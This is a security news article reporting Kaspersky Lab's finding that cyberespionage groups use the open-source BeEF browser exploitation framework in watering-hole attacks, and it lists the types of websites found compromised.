Attackers use open source security tools for targeted cyberespionage

Kaspersky Lab researchers have uncovered a new trend among cyberespionage threat actors: instead of developing customized hacking tools or buying them from third-party suppliers on the criminal underground, they are using tools available on the web for research purposes. Several cyberespionage campaigns utilizing such tools have been spotted recently by experts.

This means that even less-professional, less-skilled and less-resourced hacker groups can now pose a threat to users and companies. Moreover, the use of legitimate tools for pen-testing makes such attacks less visible to security solutions.

The browser exploitation framework, or BeEF, is one such tool. Originally developed by the security community to make the security testing of browsers better and easier, it is now used by several cyberespionage groups to attack targets around the world.

To exploit vulnerabilities in targets’ browsers, the hackers compromise websites of interest, plant BeEF on it, and then just wait for potential victims to visit these websites. The BeEF content enables the precise identification of both system and user and allows for the exploitation and theft of authentication credentials which in turn enable additional malware to be downloaded to a compromised device, and more. This infection tactic is called setting up a watering hole and is often used by cyberespionage actors.

“Cybercriminals are going to continue looking for ways to use what already exists for their criminal gain, especially if it takes little time and effort, and that includes open source and legitimate tools. The creativity of repurposing tools and exploits will undoubtedly continue and likely increase in the future,” Kurt Baumgartner, Principal Security Researcher, Kaspersky Lab, told Help Net Security.

During their research, the Kaspersky Lab specialists were able to identify tens of such “watering hole” websites. The nature and topics of these websites reveals a lot about the types of potential targets:

• Middle-eastern embassy in the Russian Federation
• Indian military technology school
• Regional presidency office
• Ukrainian ICS Scanner mirror
• European Union education diversification support agency
• Russian foreign trade management organization
• Progressive Kazakh news and political media
• Turkish news organization
• Specialized German music school
• Japanese textile manufacturing inspection organization
• Middle Eastern social responsibility and philanthropy
• Popular British “lifestyle” blog
• Algerian University’s online course platform
• Chinese construction group
• Russian overseas business development and holding company
• Russian gaming developer forum
• Romanian Steam gaming developer
• Chinese online gaming virtual gold seller
• Brazilian music instrument retailer.